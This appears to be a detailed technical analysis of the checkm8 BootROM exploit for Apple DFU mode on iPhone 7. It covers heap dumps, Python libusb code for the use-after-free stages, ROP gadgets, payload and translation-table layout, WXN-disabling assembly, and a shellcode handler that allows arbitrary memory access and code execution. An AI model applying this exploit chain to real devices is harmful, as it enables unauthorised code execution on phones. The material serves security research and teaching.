    000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x4900  // task stack
    0x4080 non-free 0x400 0
    00000000: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000010: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000020: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000030: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000040: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000050: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000060: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000070: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000080: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    00000090: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    000000A0: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    000000B0: 6B 61 74 73 6B 61 74 73  6B 61 74 73 6B 61 74 73  katskatskatskats
    chunk at 0x8980  // io_buf
    0x840 non-free 0x4080 0
    00000000: 63 6D 65 6D 63 6D 65 6D  00 00 00 00 00 00 00 00  cmemcmem........
    00000010: 10 00 0B 80 01 00 00 00  00 00 1B 80 01 00 00 00  ................
    00000020: EF FF 00 00 00 00 00 00  10 08 0B 80 01 00 00 00  ................
    00000030: 4C CC 00 00 01 00 00 00  20 08 0B 80 01 00 00 00  L....... .......
    00000040: 4C CC 00 00 01 00 00 00  30 08 0B 80 01 00 00 00  L.......0.......
    00000050: 4C CC 00 00 01 00 00 00  40 08 0B 80 01 00 00 00  L.......@.......
    00000060: 4C CC 00 00 01 00 00 00  A0 08 0B 80 01 00 00 00  L...............
    00000070: 00 06 0B 80 01 00 00 00  6C 04 00 00 01 00 00 00  ........l.......
    00000080: 00 00 00 00 00 00 00 00  78 04 00 00 01 00 00 00  ........x.......
    00000090: 00 00 00 00 00 00 00 00  B8 A4 00 00 01 00 00 00  ................
    000000A0: 00 00 0B 80 01 00 00 00  E4 03 00 00 01 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  34 04 00 00 01 00 00 00  ........4.......
    chunk at 0x91c0  // hs config
    0x80 non-free 0x0 0
    00000000: 09 02 19 00 01 01 05 80  FA 09 04 00 00 00 FE 01  ................
    00000010: 00 00 07 21 01 0A 00 00  08 00 00 00 00 00 00 00  ...!............
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x9240  // fs config
    0x80 non-free 0x0 0
    00000000: 09 02 19 00 01 01 05 80  FA 09 04 00 00 00 FE 01  ................
    00000010: 00 00 07 21 01 0A 00 00  08 00 00 00 00 00 00 00  ...!............
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    chunk at 0x92c0
    0x80 non-free 0x0 0
    00000000: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000010: 01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 6C CC 00 00 01 00 00 00  00 08 0B 80 01 00 00 00  l...............
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x9340
    0x80 non-free 0x80 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF C0 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 48 DE 00 00 01 00 00 00  C0 93 1B 80 01 00 00 00  H...............
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x93c0
    0x80 non-free 0x80 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  40 94 1B 80 01 00 00 00  ........@.......
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x9440
    0x80 non-free 0x80 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x94c0
    0x180 non-free 0x80 0
    00000000: E4 03 43 00 50 00 49 00  44 00 3A 00 38 00 30 00  ..C.P.I.D.:.8.0.
    00000010: 31 00 30 00 20 00 43 00  50 00 52 00 56 00 3A 00  1.0. .C.P.R.V.:.
    00000020: 31 00 31 00 20 00 43 00  50 00 46 00 4D 00 3A 00  1.1. .C.P.F.M.:.
    00000030: 30 00 33 00 20 00 53 00  43 00 45 00 50 00 3A 00  0.3. .S.C.E.P.:.
    00000040: 30 00 31 00 20 00 42 00  44 00 49 00 44 00 3A 00  0.1. .B.D.I.D.:.
    00000050: 30 00 43 00 20 00 45 00  43 00 49 00 44 00 3A 00  0.C. .E.C.I.D.:.
    00000060: 30 00 30 00 31 00 41 00  34 00 30 00 33 00 36 00  0.0.1.A.4.0.3.6.
    00000070: 32 00 30 00 34 00 35 00  45 00 35 00 32 00 36 00  2.0.4.5.E.5.2.6.
    00000080: 20 00 49 00 42 00 46 00  4C 00 3A 00 33 00 43 00   .I.B.F.L.:.3.C.
    00000090: 20 00 53 00 52 00 54 00  47 00 3A 00 5B 00 69 00   .S.R.T.G.:.[.i.
    000000A0: 42 00 6F 00 6F 00 74 00  2D 00 32 00 36 00 39 00  B.o.o.t.-.2.6.9.
    000000B0: 36 00 2E 00 30 00 2E 00  30 00 2E 00 31 00 2E 00  6...0...0...1...
    chunk at 0x9640  // zlps[1]
    0x80 non-free 0x180 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x96c0  // descs[0], Nonce
    0x140 non-free 0x80 0
    00000000: EA 03 20 00 4E 00 4F 00  4E 00 43 00 3A 00 35 00  .. .N.O.N.C.:.5.
    00000010: 35 00 46 00 38 00 43 00  41 00 39 00 37 00 41 00  5.F.8.C.A.9.7.A.
    00000020: 46 00 45 00 36 00 30 00  36 00 43 00 39 00 41 00  F.E.6.0.6.C.9.A.
    00000030: 41 00 31 00 31 00 32 00  44 00 38 00 42 00 37 00  A.1.1.2.D.8.B.7.
    00000040: 43 00 46 00 33 00 35 00  30 00 46 00 42 00 36 00  C.F.3.5.0.F.B.6.
    00000050: 35 00 37 00 36 00 43 00  41 00 41 00 44 00 30 00  5.7.6.C.A.A.D.0.
    00000060: 38 00 43 00 39 00 35 00  39 00 39 00 34 00 41 00  8.C.9.5.9.9.4.A.
    00000070: 46 00 32 00 34 00 42 00  43 00 38 00 44 00 32 00  F.2.4.B.C.8.D.2.
    00000080: 36 00 37 00 30 00 38 00  35 00 43 00 31 00 20 00  6.7.0.8.5.C.1. .
    00000090: 53 00 4E 00 4F 00 4E 00  3A 00 42 00 42 00 41 00  S.N.O.N.:.B.B.A.
    000000A0: 30 00 41 00 36 00 46 00  31 00 36 00 42 00 35 00  0.A.6.F.1.6.B.5.
    000000B0: 31 00 37 00 45 00 31 00  44 00 33 00 39 00 32 00  1.7.E.1.D.3.9.2.
    chunk at 0x9800  // descs[1], Manufacturer
    0x80 non-free 0x140 0
    00000000: 16 03 41 00 70 00 70 00  6C 00 65 00 20 00 49 00  ..A.p.p.l.e. .I.
    00000010: 6E 00 63 00 2E 00 D6 D7  D8 D9 DA DB DC DD DE DF  n.c.............
    00000020: E0 E1 E2 E3 E4 E5 E6 E7  E8 E9 EA EB EC ED EE EF  ................
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x9880  // descs[2], Product
    0x80 non-free 0x80 0
    00000000: 3E 03 41 00 70 00 70 00  6C 00 65 00 20 00 4D 00  >.A.p.p.l.e. .M.
    00000010: 6F 00 62 00 69 00 6C 00  65 00 20 00 44 00 65 00  o.b.i.l.e. .D.e.
    00000020: 76 00 69 00 63 00 65 00  20 00 28 00 44 00 46 00  v.i.c.e. .(.D.F.
    00000030: 55 00 20 00 4D 00 6F 00  64 00 65 00 29 00 FE FF  U. .M.o.d.e.)...
    chunk at 0x9900  // descs[3], Serial number
    0x140 non-free 0x80 0
    00000000: C6 03 43 00 50 00 49 00  44 00 3A 00 38 00 30 00  ..C.P.I.D.:.8.0.
    00000010: 31 00 30 00 20 00 43 00  50 00 52 00 56 00 3A 00  1.0. .C.P.R.V.:.
    00000020: 31 00 31 00 20 00 43 00  50 00 46 00 4D 00 3A 00  1.1. .C.P.F.M.:.
    00000030: 30 00 33 00 20 00 53 00  43 00 45 00 50 00 3A 00  0.3. .S.C.E.P.:.
    00000040: 30 00 31 00 20 00 42 00  44 00 49 00 44 00 3A 00  0.1. .B.D.I.D.:.
    00000050: 30 00 43 00 20 00 45 00  43 00 49 00 44 00 3A 00  0.C. .E.C.I.D.:.
    00000060: 30 00 30 00 31 00 41 00  34 00 30 00 33 00 36 00  0.0.1.A.4.0.3.6.
    00000070: 32 00 30 00 34 00 35 00  45 00 35 00 32 00 36 00  2.0.4.5.E.5.2.6.
    00000080: 20 00 49 00 42 00 46 00  4C 00 3A 00 33 00 43 00   .I.B.F.L.:.3.C.
    00000090: 20 00 53 00 52 00 54 00  47 00 3A 00 5B 00 69 00   .S.R.T.G.:.[.i.
    000000A0: 42 00 6F 00 6F 00 74 00  2D 00 32 00 36 00 39 00  B.o.o.t.-.2.6.9.
    000000B0: 36 00 2E 00 30 00 2E 00  30 00 2E 00 31 00 2E 00  6...0...0...1...
    chunk at 0x9a40  // zlps[0]
    0x80 non-free 0x140 0
    00000000: 80 00 00 00 00 00 00 00  00 89 08 80 01 00 00 00  ................
    00000010: FF FF FF FF 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  40 96 1B 80 01 00 00 00  ........@.......
    00000030: F0 F1 F2 F3 F4 F5 F6 F7  F8 F9 FA FB FC FD FE FF  ................
    chunk at 0x9ac0
    0x46540 free 0x80 0
    00000000: 00 00 00 00 00 00 00 00  F8 8F 08 80 01 00 00 00  ................
    00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  ................
    00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000080: 00 00 00 00 00 00 00 00  F8 8F 08 80 01 00 00 00  ................
    00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

    You can also achieve an interesting effect by overflowing the High Speed and Full Speed configuration descriptors, which are located right after the IO buffer. One of the fields of a configuration descriptor (wTotalLength) holds the overall length of the descriptor. By overwriting this field, we can make the device return data from beyond the descriptor. You can try it yourself by modifying the exploit.
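
    To make the length field concrete, here is a minimal sketch that unpacks the first 9 bytes of the "hs config" chunk from the dump above according to the standard USB configuration descriptor layout, and then simulates an overflow of wTotalLength. The function name and the 0xFFFF value are ours and purely illustrative; nothing here talks to a device.

```python
import struct

# First 9 bytes of the "hs config" chunk from the heap dump above.
CONFIG_DESCRIPTOR = bytes.fromhex("09 02 19 00 01 01 05 80 FA")

# Field names of the standard USB configuration descriptor header.
FIELDS = ("bLength", "bDescriptorType", "wTotalLength", "bNumInterfaces",
          "bConfigurationValue", "iConfiguration", "bmAttributes", "bMaxPower")


def parse_config_descriptor(raw):
    """Unpack the 9-byte configuration descriptor header (little-endian)."""
    return dict(zip(FIELDS, struct.unpack("<BBHBBBBB", raw[:9])))


original = parse_config_descriptor(CONFIG_DESCRIPTOR)
print("wTotalLength before:", hex(original["wTotalLength"]))

# Simulate an overflow that rewrites bytes 2..3 (wTotalLength).
# 0xFFFF is an arbitrary illustrative value, not one used by the exploit.
corrupted = bytearray(CONFIG_DESCRIPTOR)
struct.pack_into("<H", corrupted, 2, 0xFFFF)
overflowed = parse_config_descriptor(bytes(corrupted))
print("wTotalLength after: ", hex(overflowed["wTotalLength"]))
```

    The original value 0x19 covers the configuration (9 bytes), interface (9 bytes) and DFU functional (7 bytes) descriptors visible in the dump.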


    2. Allocation and freeing of the IO buffer without clearing the global state


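    device = dfu.acquire_device()
    device.serial_number
    # bRequest 1: image download; the tiny timeout leaves the OUT request incomplete
    libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001)
    # bRequest 4: DFU_CLR_STATUS, resets DFU
    libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
    dfu.release_device(device)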

    At this stage, an incomplete OUT request for uploading the image is created. At the same time, the global state is initialized, and the address of the buffer in the heap is written to io_buffer. Then, DFU is reset with a DFU_CLR_STATUS request, and a new iteration of DFU begins. The IO buffer is freed, but the global state is not cleared and still holds its address.
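
    The numeric arguments of the two transfers are the fields of a standard USB SETUP packet. As a small sketch (the helper names are ours, not part of ipwndfu), this is how bmRequestType 0x21 decodes and what the 8-byte SETUP packet for the 0x800-byte download looks like on the wire:

```python
import struct


def setup_packet(bm_request_type, b_request, w_value, w_index, w_length):
    """Pack the 8-byte USB SETUP packet (all fields little-endian)."""
    return struct.pack("<BBHHH", bm_request_type, b_request,
                       w_value, w_index, w_length)


def describe_request_type(bm_request_type):
    """Split bmRequestType into direction, type and recipient."""
    direction = "device-to-host" if bm_request_type & 0x80 else "host-to-device"
    kind = ("standard", "class", "vendor", "reserved")[(bm_request_type >> 5) & 3]
    recipients = {0: "device", 1: "interface", 2: "endpoint", 3: "other"}
    recipient = recipients.get(bm_request_type & 0x1F, "reserved")
    return direction, kind, recipient


# bRequest 1 with 0x800 bytes of data: the image download from the snippet above.
download = setup_packet(0x21, 1, 0, 0, 0x800)
# bRequest 4 with no data: the DFU_CLR_STATUS request.
clear_status = setup_packet(0x21, 4, 0, 0, 0)

print(describe_request_type(0x21))
print(" ".join(f"{b:02X}" for b in download))
print(" ".join(f"{b:02X}" for b in clear_status))
```

    Both requests are class-specific, host-to-device requests addressed to the interface, which is why they end up in the DFU interface handler.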


    3. Overwriting usb_device_io_request in the heap with use-after-free


    device = dfu.acquire_device()
    device.serial_number
    stall(device)
    leak(device)
    leak(device)
    libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)

    At this stage, a usb_device_io_request object is allocated in the heap, and it is overwritten with t8010_overwrite, whose content was defined at the first stage.


    The values t8010_nop_gadget and 0x1800B0800 should overwrite the callback and next fields of the usb_device_io_request structure.


    t8010_nop_gadget is shown below. It lives up to its name, but in addition to returning from the function, it restores the previous LR register, so the call to free that follows the callback in usb_core_complete_endpoint_io is skipped. This is important: the overflow damages the heap's metadata, and an attempt to free the request would break the exploit.


    bootrom:000000010000CC6C                 LDP             X29, X30, [SP,#0x10+var_s0] // restore fp, lr
    bootrom:000000010000CC70                 LDP             X20, X19, [SP+0x10+var_10],#0x20
    bootrom:000000010000CC74                 RET

    next points to INSECURE_MEMORY + 0x800. Later, INSECURE_MEMORY will store the exploit's payload, and at the offset of 0x800 in the payload, there is a callback-chain, which we'll discuss later on.
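
    The tail of the overwrite can be sketched as follows. The offsets 0x20 (callback) and 0x28 (next) are our reading of the heap dump above, where the two pointers occupy the third 16-byte row of the request chunks; they are not taken from the SecureROM sources. The padding that precedes this structure in t8010_overwrite depends on the heap layout and is left out.

```python
import struct

NOP_GADGET = 0x10000CC6C      # address of the gadget in the listing above
CALLBACK_CHAIN = 0x1800B0800  # INSECURE_MEMORY + 0x800

# 32 padding bytes stand in for the fields that precede callback
# (assumed layout), followed by the callback and next pointers.
request_image = struct.pack("<32x2Q", NOP_GADGET, CALLBACK_CHAIN)

callback, next_request = struct.unpack_from("<2Q", request_image, 0x20)
print(" ".join(f"{b:02X}" for b in request_image[0x20:0x30]))
print(hex(callback), hex(next_request))
```

    The printed row can be compared with offset 0x20 of the chunk at 0x92c0 in the dump, which shows the state of the heap after the overwrite.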


    4. Placing the payload


    for i in range(0, len(payload), 0x800):
        libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0,
                                       payload[i:i+0x800], 50)

    At this stage, every following packet is put into the memory area allocated for the image. The payload looks like this:


    0x1800B0000: t8010_shellcode  # initializing shell-code
    ...
    0x1800B0180: t8010_handler  # new usb request handler
    ...
    0x1800B0400: 0x1000006a5  # fake translation table descriptor
                              # corresponds to SecureROM (0x100000000 -> 0x100000000)
                              # matches the value in the original translation table
    ...
    0x1800B0600: 0x60000180000625  # fake translation table descriptor
                                   # corresponds to SecureRAM (0x180000000 -> 0x180000000)
                                   # matches the value in the original translation table
    0x1800B0608: 0x1800006a5  # fake translation table descriptor
                              # new value translates 0x182000000 into 0x180000000
                              # plus, this descriptor grants code execution rights
    0x1800B0610: disable_wxn_arm64  # code for disabling WXN
    0x1800B0800: usb_rop_callbacks  # callback-chain
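
    The layout and the 0x800-byte chunking can be sketched like this. The blobs passed to build_payload are placeholders standing in for the real shellcode, handler, WXN code and callback chain; the helper names are ours, and the assumption that consecutive packets land at consecutive 0x800-byte offsets of the image area follows from the description above.

```python
import struct

PAYLOAD_BASE = 0x1800B0000  # INSECURE_MEMORY
CHUNK_SIZE = 0x800          # size of one download packet


def place(image, offset, blob, limit):
    """Copy blob into image at offset, refusing to spill into the next region."""
    if offset + len(blob) > limit:
        raise ValueError("blob overlaps the next region")
    image[offset:offset + len(blob)] = blob


def build_payload(shellcode, handler, disable_wxn, callbacks):
    """Assemble the payload according to the layout listed above."""
    image = bytearray(0x800)
    place(image, 0x000, shellcode, 0x180)
    place(image, 0x180, handler, 0x400)
    struct.pack_into("<Q", image, 0x400, 0x1000006A5)
    struct.pack_into("<2Q", image, 0x600, 0x60000180000625, 0x1800006A5)
    place(image, 0x610, disable_wxn, 0x800)
    return bytes(image) + callbacks  # the callback chain starts at 0x800


def split_into_packets(payload, size=CHUNK_SIZE):
    """Split the payload the same way the loop above does."""
    return [payload[i:i + size] for i in range(0, len(payload), size)]


# Placeholder blobs, only to exercise the layout.
payload = build_payload(b"\x01" * 8, b"\x02" * 8, b"\x03" * 8, b"\x04" * 0x40)
for index, packet in enumerate(split_into_packets(payload)):
    print(hex(PAYLOAD_BASE + index * CHUNK_SIZE), hex(len(packet)))
```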

    5. Execution of callback-chain


    dfu.usb_reset(device)
    dfu.release_device(device)

    After the USB reset, BootROM starts a loop that walks the linked list of queued usb_device_io_request objects and cancels every incomplete one, calling its callback. In the previous stages, we replaced the rest of the queue, which allows us to control the callback chain. To build this chain, we use this gadget:


    bootrom:000000010000CC4C                 LDP             X8, X10, [X0,#0x70] ; X0 - usb_device_io_request pointer; X8 = arg0, X10 = call address
    bootrom:000000010000CC50                 LSL             W2, W2, W9
    bootrom:000000010000CC54                 MOV             X0, X8 ; arg0
    bootrom:000000010000CC58                 BLR             X10 ; call
    bootrom:000000010000CC5C                 CMP             W0, #0
    bootrom:000000010000CC60                 CSEL            W0, W0, W19, LT
    bootrom:000000010000CC64                 B               loc_10000CC6C
    bootrom:000000010000CC68 ; ---------------------------------------------------------------------------
    bootrom:000000010000CC68
    bootrom:000000010000CC68 loc_10000CC68                           ; CODE XREF: sub_10000CC1C+18↑j
    bootrom:000000010000CC68                 MOV             W0, #0
    bootrom:000000010000CC6C
    bootrom:000000010000CC6C loc_10000CC6C                           ; CODE XREF: sub_10000CC1C+48↑j
    bootrom:000000010000CC6C                 LDP             X29, X30, [SP,#0x10+var_s0]
    bootrom:000000010000CC70                 LDP             X20, X19, [SP+0x10+var_10],#0x20
    bootrom:000000010000CC74                 RET

    As you can see, at the offset of 0x70 from the pointer to the structure, the call's address and its first argument are loaded. With this gadget, we can easily make any f(x) type calls for arbitrary f and x.
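
    To illustrate how such a chain hangs together, here is a simplified sketch that builds one fake request per call and then walks the list the way the cancel loop would. It is not the layout produced by usb_rop_callbacks in ipwndfu, which may pack the entries differently: the 0x80-byte stride is hypothetical, the callback/next offsets (0x20/0x28) are read from the heap dump, and only calls whose addresses appear in this article are included (the zero arguments for dmb and tlbi are placeholders).

```python
import struct

FUNC_GADGET = 0x10000CC4C  # the gadget from the listing above
CHAIN_BASE = 0x1800B0800   # address of the chain inside the payload
REQUEST_SIZE = 0x80        # hypothetical stride: one fake request per call

# (function address, first argument) pairs taken from the listings in this article.
CALLS = [
    (0x10000046C, 0x1800B0600),  # dc_civac
    (0x100000478, 0),            # dmb (argument unused, placeholder)
    (0x1000003E4, 0x1800B0000),  # write_ttbr0
    (0x100000434, 0),            # tlbi (argument unused, placeholder)
]


def build_chain(base, calls):
    """Lay out fake requests: callback/next at +0x20, argument/function at +0x70."""
    blob = bytearray(REQUEST_SIZE * len(calls))
    for i, (func, arg) in enumerate(calls):
        offset = i * REQUEST_SIZE
        is_last = i == len(calls) - 1
        next_ptr = 0 if is_last else base + offset + REQUEST_SIZE
        struct.pack_into("<2Q", blob, offset + 0x20, FUNC_GADGET, next_ptr)
        struct.pack_into("<2Q", blob, offset + 0x70, arg, func)  # X8, X10
    return bytes(blob)


def walk_chain(base, blob):
    """Follow the next pointers and record what the gadget would call."""
    executed = []
    address = base
    while address:
        offset = address - base
        callback, next_ptr = struct.unpack_from("<2Q", blob, offset + 0x20)
        arg, func = struct.unpack_from("<2Q", blob, offset + 0x70)
        if callback != FUNC_GADGET:
            raise ValueError("unexpected callback in chain")
        executed.append((func, arg))
        address = next_ptr
    return executed


chain = build_chain(CHAIN_BASE, CALLS)
for func, arg in walk_chain(CHAIN_BASE, chain):
    print(f"call {func:#x}({arg:#x})")
```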


    The entire call chain can be easily emulated with Unicorn Engine. We did it with our modified version of the plugin uEmu.



    The results of the entire chain for iPhone 7 can be found below.


    5.1. dc_civac 0x1800B0600


    000000010000046C: SYS #3, c7, c14, #1, X0
    0000000100000470: RET

    Cleans and invalidates the data cache line at the given virtual address. This ensures that later accesses to our payload see the data we have written to memory rather than stale cache contents.


    5.2. dmb


    0000000100000478: DMB SY
    000000010000047C: RET

    A memory barrier that guarantees the completion of all operations with the memory done before this instruction. Instructions in high-performance processors can be executed in an order different from the programmed one for the purpose of optimization.


    5.3. enter_critical_section()


    Then, interrupts are masked for the atomic execution of further operations.


    5.4. write_ttbr0(0x1800B0000)


    00000001000003E4: MSR #0, c2, c0, #0, X0; [>] TTBR0_EL1 (Translation Table Base Register 0 (EL1))
    00000001000003E8: ISB
    00000001000003EC: RET

    The translation table base register TTBR0_EL1 is set to 0x1800B0000. It is the address of INSECURE_MEMORY, where the exploit's payload is stored. As mentioned before, the translation descriptors are located at certain offsets in the payload:


    ...
    0x1800B0400: 0x1000006a5           0x100000000 -> 0x100000000 (rx)
    ...
    0x1800B0600: 0x60000180000625      0x180000000 -> 0x180000000 (rw)
    0x1800B0608: 0x1800006a5           0x182000000 -> 0x180000000 (rx)
    ...
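
    The three mappings can be reproduced with a few lines of arithmetic. This sketch assumes that each 8-byte entry of the table covers a 0x2000000-byte block (inferred from the neighbouring entries for 0x180000000 and 0x182000000) and uses the ARMv8-A block descriptor bit positions: output address in bits [47:25], AP[2] (read-only) in bit 7, and PXN in bit 53. The helper name is ours.

```python
BLOCK_SIZE = 0x2000000                   # assumption: one table entry maps 32 MB
OUTPUT_ADDRESS_MASK = 0x0000FFFFFE000000  # descriptor bits [47:25]

# Offsets inside the payload and the descriptors stored there.
ENTRIES = {
    0x400: 0x1000006A5,
    0x600: 0x60000180000625,
    0x608: 0x1800006A5,
}


def decode_entry(offset, descriptor):
    """Return (virtual address, physical address, permissions) for one entry."""
    virtual = (offset // 8) * BLOCK_SIZE
    physical = descriptor & OUTPUT_ADDRESS_MASK
    read_only = bool(descriptor & (1 << 7))       # AP[2]
    no_execute = bool(descriptor & (1 << 53))     # PXN
    permissions = "r" + ("" if read_only else "w") + ("" if no_execute else "x")
    return virtual, physical, permissions


for offset, descriptor in ENTRIES.items():
    virtual, physical, permissions = decode_entry(offset, descriptor)
    print(f"{virtual:#x} -> {physical:#x} ({permissions})")
```

    The last entry is the interesting one: it creates an executable alias of SecureRAM at 0x182000000, which is why the next call in the chain targets 0x1820B0610 rather than 0x1800B0610.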

    5.5. tlbi


    0000000100000434: DSB SY
    0000000100000438: SYS #0, c8, c7, #0
    000000010000043C: DSB SY
    0000000100000440: ISB
    0000000100000444: RET

    The TLB (translation lookaside buffer) is invalidated so that addresses are translated according to our new translation table.


    5.6. 0x1820B0610 - disable_wxn_arm64


    MOV  X1, #0x180000000
    ADD  X2, X1, #0xA0000
    ADD  X1, X1, #0x625
    STR  X1, [X2,#0x600]
    DMB  SY
    
    MOV  X0, #0x100D
    MSR  SCTLR_EL1, X0
    DSB  SY
    ISB
    
    RET

    WXN (Write permission implies Execute-never) is disabled to allow us to execute code in RW memory. The execution of the WXN disabling code is possible due to the modified translation table.
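
    The constants in this routine can be checked with plain arithmetic. The sketch below replays the address computations from the listing and decodes 0x100D using the architectural SCTLR_EL1 bit positions (M = 0, C = 2, SA = 3, I = 12, WXN = 19). The interpretation of the store as patching the entry for SecureRAM in the original table at 0x1800A0000 is our reading, based on the address restored into TTBR0_EL1 in the next step.

```python
# Replay of the register arithmetic from disable_wxn_arm64.
x1 = 0x180000000
x2 = x1 + 0xA0000          # 0x1800A0000: base of the original translation table
x1 = x1 + 0x625            # new descriptor value, without the execute-never bits
store_address = x2 + 0x600  # entry that maps 0x180000000

SCTLR_VALUE = 0x100D
SCTLR_BITS = {0: "M", 2: "C", 3: "SA", 12: "I", 19: "WXN"}

set_bits = [bit for bit in range(32) if SCTLR_VALUE >> bit & 1]
wxn_enabled = bool(SCTLR_VALUE >> 19 & 1)

# The routine runs through the executable alias created by the fake table.
alias_address = 0x1820B0610
physical_address = alias_address - 0x182000000 + 0x180000000

print(f"store {x1:#x} at {store_address:#x}")
print("SCTLR_EL1 bits set:", [SCTLR_BITS.get(bit, str(bit)) for bit in set_bits])
print("WXN enabled:", wxn_enabled)
print(f"{alias_address:#x} is backed by {physical_address:#x}")
```

    Compared with the descriptor 0x60000180000625 from the payload layout, the stored value 0x180000625 differs only in the two upper bits that forbid execution.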


    5.7. write_ttbr0(0x1800A0000)


    00000001000003E4: MSR #0, c2, c0, #0, X0; [>] TTBR0_EL1 (Translation Table Base Register 0 (EL1))
    00000001000003E8: ISB
    00000001000003EC: RET

    The original value of the TTBR0_EL1 translation register is restored. It is necessary for the correct operation of BootROM during the translation of virtual addresses because the data in INSECURE_MEMORY will be overwritten.


    5.8. tlbi


    The TLB is invalidated again.


    5.9. exit_critical_section()


    Interrupt handling is back to normal.


    5.10. 0x1800B0000


    Control is transferred to the initializing shellcode.


    Thus, the main task of callback-chain is to disable WXN and transfer control to the shellcode in RW memory.


    6. Execution of shellcode


    The shellcode is in src/checkm8_arm64.S and does the following:


    6.1. Overwriting USB configuration descriptors


    In the global memory, two pointers to configuration descriptors usb_core_hs_configuration_descriptor and usb_core_fs_configuration_descriptor located in the heap are stored. In the third stage, these descriptors were damaged. They are necessary for the correct interaction with a USB device, so the shellcode restores them.


    6.2. Changing USBSerialNumber


    A new string descriptor with a serial number is created with a substring " PWND:[checkm8]" added to it. This will help us understand if the exploit was successful.
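
    A USB string descriptor is a length byte, the type byte 0x03, and the text in UTF-16LE, which is the format visible in the descs[] chunks of the heap dump. A minimal sketch (the function name and the shortened serial string are ours and purely illustrative):

```python
def string_descriptor(text):
    """Build a USB string descriptor: bLength, bDescriptorType (3), UTF-16LE text."""
    body = text.encode("utf-16-le")
    length = 2 + len(body)
    if length > 0xFF:
        raise ValueError("string does not fit into a single descriptor")
    return bytes([length, 0x03]) + body


manufacturer = string_descriptor("Apple Inc.")
print(" ".join(f"{b:02X}" for b in manufacturer))

# Illustrative, shortened serial string with the marker appended.
serial = "CPID:8010 CPRV:11" + " PWND:[checkm8]"
patched = string_descriptor(serial)
print(hex(patched[0]), patched[2:].decode("utf-16-le"))
```

    The first call reproduces the header bytes 16 03 of the Manufacturer descriptor in the dump.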


    6.3. Overwriting the pointer of the USB request handler


    The original pointer to the handler of USB requests to the interface is overwritten by a pointer to a new handler, which will be placed in the memory at the next step.


    6.4. Copying USB request handler into TRAMPOLINE memory area (0x1800AFC00)


    Upon receiving a USB request, the new handler checks the wValue of the request against 0xffff, and if they're not equal, it transfers control back to the original handler. If they are equal, various commands can be executed in the new handler, like memcpy, memset, and exec (calling an arbitrary address with an arbitrary set of arguments).
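
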